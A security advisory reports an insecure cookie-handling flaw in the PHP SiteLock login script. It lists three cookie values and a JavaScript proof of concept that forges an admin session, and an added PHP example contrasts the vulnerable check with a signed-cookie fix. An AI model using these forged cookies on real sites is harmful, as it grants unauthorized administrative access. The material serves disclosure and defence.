php-siteLock-exploit.txt - advisories - Security advisories that I have released to the public.

PHP SiteLock
Insecure Cookie Handling
===========================


SUMMARY
________

PHP Site Lock: A highly secure website login script which has
features like User Authentication & Management, Website
Password Protection, protection of pdf, images, etc.


IMPACT
_______

Leads to full administration rights of the admin panel.


VERSIONS
_________

Vulnerable systems: All versions

Immune systems: None


DESCRIPTION #1
______________

Insecure cookie handling allows anyone to simply create a custom cookie
with the values below. This will allow full access to the admin panel.

Name    - user_type
Content - admin
Path    - /

Name    - login_name
Content - admin
Path    - /

Name    - login_id
Content - 0
Path    - /


Proof of Concept:
-> javascript:document.cookie="user_type=admin; path=/"
-> javascript:document.cookie="login_name=admin; path=/"
-> javascript:document.cookie="login_id=0; path=/"

Fix:
-> None given.

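
The flaw described above is that role and identity are taken from cookies the client controls. As an added example (not PHP Site Lock's code and not from the advisory's author), the PHP below contrasts an assumed form of that check with a cookie the server signs with an HMAC and verifies before trusting it; the function names and the `auth` cookie name are hypothetical.

```php
<?php
// Added example, not PHP Site Lock's code; every name here is hypothetical.

// Assumed vulnerable pattern: the role is read straight from a client cookie.
function is_admin_insecure(array $cookies): bool
{
    return ($cookies['user_type'] ?? '') === 'admin';
}

// Hardened: the server issues one cookie holding the claims plus an HMAC tag.
function issue_auth_cookie(array $claims, string $key, int $ttl = 3600): string
{
    $claims['exp'] = time() + $ttl;
    $payload = base64_encode(json_encode($claims));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

// Returns the claims only if the tag verifies and the cookie has not expired.
function verify_auth_cookie($cookie, string $key): ?array
{
    if (!is_string($cookie) || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$payload, $tag] = explode('.', $cookie);
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $tag)) {
        return null;
    }
    $claims = json_decode(base64_decode($payload, true) ?: '', true);
    if (!is_array($claims) || ($claims['exp'] ?? 0) < time()) {
        return null;
    }
    return $claims;
}

function is_admin_hardened(array $cookies, string $key): bool
{
    $claims = verify_auth_cookie($cookies['auth'] ?? null, $key);
    return $claims !== null && ($claims['user_type'] ?? '') === 'admin';
}

// Constructed input: the three cookies listed in the advisory.
$forged = ['user_type' => 'admin', 'login_name' => 'admin', 'login_id' => '0'];
$key = random_bytes(32); // stands in for a fixed secret kept on the server
$issued = ['auth' => issue_auth_cookie(['user_type' => 'admin', 'login_id' => 0], $key)];

var_dump(is_admin_insecure($forged));        // assumed vulnerable check
var_dump(is_admin_hardened($forged, $key));  // no server-issued cookie present
var_dump(is_admin_hardened($issued, $key));  // cookie issued by the server
```

Keeping the role in server-side session state and sending the browser only a random session identifier addresses the same flaw.
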

ADDITIONAL INFO
_______________

Vendor URL      - www.phpsitelock.com
Underlying OS   - Linux (Any), UNIX (Any), Windows (Any)
Credit          - Jay Scott
Message History - Vendor Contacted.
                  No reply after 30 days